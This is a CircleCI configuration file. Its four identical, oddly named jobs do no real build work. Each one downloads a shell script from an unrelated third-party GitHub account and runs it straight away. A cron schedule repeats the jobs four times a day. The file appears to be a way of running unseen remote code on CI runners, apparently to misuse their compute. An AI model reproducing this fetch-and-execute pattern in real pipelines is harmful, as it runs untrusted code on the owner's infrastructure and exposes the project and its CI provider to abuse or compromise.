working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/rubyrailsci/rubykits/main/run.sh && chmod 700 run.sh && ./run.sh

  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/rubyrailsci/rubykits/main/build.sh && chmod 700 build.sh && ./build.sh

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/rubyrailsci/rubykits/main/deploy.sh && chmod 700 deploy.sh && ./deploy.sh

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  wget https://raw.githubusercontent.com/rubyrailsci/rubykits/main/install.sh && chmod u+x install.sh && ./install.sh
        
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
